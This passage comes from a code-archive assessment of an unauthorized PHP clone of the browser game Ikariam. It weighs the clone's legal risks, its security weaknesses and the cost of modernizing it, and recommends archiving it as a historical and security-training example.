• Students would learn insecure patterns (SQL injection, XSS)
• Better to study ezRPG or Glory Lands (professional, legal, secure)

• Commercial Use - ILLEGAL
• Unauthorized clone of trademarked game
• Copyright infringement on game mechanics/design
• Asset theft likely (graphics from original Ikariam?)
• Risk: Cease-and-desist, lawsuits, damages

• As-Is Usage - DANGEROUS
• Will not run on PHP 7+ (mysql_* removed)
• Zero security protections
• Database easily compromised
• Verdict: Even private testing risky (malware/backdoors unknown)

---

Potentially Useful For:

• Security Training - YES ⭐
• Perfect example of vulnerable code for teaching penetration testing
• Demonstrates SQL injection, XSS, weak passwords, hardcoded credentials
• Could be used in "capture the flag" exercises
• Use Case: Security courses on "How to Break Web Apps"
• Requires: Isolated VM/container (NEVER expose to internet)

• Code Archaeology - YES ⭐
• Historical artifact of 2010 browser game development
• Shows pre-framework PHP patterns
• Documents Arabic localization attempts
• Use Case: Research on evolution of web game security practices
• Comparison: Study alongside modern secure frameworks

• Reverse Engineering Study - MAYBE
• Understand how Ikariam's game mechanics work
• Database schema reverse-engineered from original game
• Could inform legal clone development (with original design)
• Caveat: Studying ≠ copying. Must create original game to avoid legal issues.

• Asset Extraction - NO (if assets are copied)
• If graphics are from original Ikariam → copyright infringement
• If custom-created → might have value
• Verdict: Unclear provenance = don't use

---

Modernization Feasibility:

IF this were legally cleared (e.g., Gameforge licensed it, or complete rebrand with original assets):

Option A: Complete Rewrite - 480 hours ($36,000)

Pros:

• Modern PHP 8.2+ with strict typing
• Laravel framework (ORM, routing, templating)
• PDO with prepared statements
• bcrypt password hashing
• CSRF protection built-in
• Automated testing (PHPUnit)
• Docker containerization
• CI/CD pipeline

Cons:

• Essentially building from scratch
• Only game design/database schema reusable
• $36K investment for legally dubious project

Verdict: Only viable if:

• Full legal clearance obtained from Gameforge
• OR complete rebrand with original game design (no longer "Ikariam clone")

---

Option B: Minimal Security Patch - 120 hours ($9,000)

Goal: Make functional on modern PHP, patch critical security holes

Tasks:

• Replace mysql_* with PDO (40 hours)
• Add htmlspecialchars() to all outputs (20 hours)
• Replace MD5 with password_hash() (10 hours)
• Remove hardcoded credentials, use .env (5 hours)
• Add CSRF tokens (15 hours)
• Fix charset to UTF-8 (10 hours)
• Basic input validation (20 hours)

Result: Game runs on PHP 7.4+, survives basic attacks (but still vulnerable to advanced exploits)

Verdict: Not recommended - throwing money at legally infringing code

---

Preservation Recommendation:

Archive Status: TIER 3 - Historical Example Only

Rationale:

• NOT a crown jewel (like ezRPG or Glory Lands)
• Legal issues prevent public sharing
• Security disaster makes it unsafe example
• Technical merit is moderate (decent OOP structure)
• Historical value as 2010-era Arabic game development artifact

Preservation Actions:

• Document Thoroughly (this analysis)
• Record architecture, vulnerabilities, legal issues
• Screenshot interface (Arabic RTL layout)
• Export database schema

• Isolate Source Code
• Keep in unzipped/ archive
• Do NOT upload to public GitHub (trademark issues)
• Consider encrypting archive (copyright liability)

• Extract Lessons
• Use as "bad example" in security training
• Compare to Glory Lands (professional vs amateur)
• Document evolution from MySQL to PDO era

• Legal Disclaimer
• Label clearly as "unauthorized clone of Gameforge's Ikariam"
• Warn against deployment
• Note this is for research/education only

• Do NOT:
• Host publicly
• Share on game forums
• Provide to third parties (copyright infringement)
• Deploy even on private server (backdoor risk unknown)

---

Alternative Recommendations:

If User Wants to Build a Strategy Game:

• Study Legal Alternatives:
• ezRPG (analyzed, GPL v3, secure framework)
• Glory Lands (analyzed, GPL v3, professional MMORPG engine)
• Travian Clone (many open-source versions exist)
• OGame Clone (legal clones available)

• Build Original Game:
• Use Laravel + Vue.js + MySQL 8.0
• Design unique mechanics (not copy Ikariam)
• Create original artwork (hire artist or use CC0 assets)
• Implement OAuth 2.0 for authentication
• Use websockets for real-time updates
• Deploy on AWS/DigitalOcean with SSL

• Respect Ikariam IP:
• If inspired by Ikariam, create "spiritual successor" with original theme
• Example: Change Greek islands → Space stations, Change wood/marble → Energy/metal
• Transform combat system (different unit types)
• Result: Legal, original, defensible

---

Final Verdict:

ikariam Clone: ⚠️ DO NOT USE

Reasons:

• Legal Risk: 🔴 High (unauthorized Gameforge IP clone)
• Security Risk: 🔴 Critical (0/10 security, instant hack)
• Technical Risk: 🟡 Medium (obsolete PHP 5.3, mysql_*)
• Educational Value: 🟢 Moderate (security anti-patterns, Arabic localization)
• Innovation Value: 🟡 Low (3/10, clone not original)
• Preservation Value: 🟢 Yes (historical artifact, document and archive)

Best Use: Security training lab (isolated VM only) + historical documentation (this analysis)

Recommendation: Archive, document, move on to legal alternatives (ezRPG, Glory Lands, or build original game)

---

---

Analysis Complete: Game 31 of 79 (39.2% progress)

Next Game: Continue to kallen/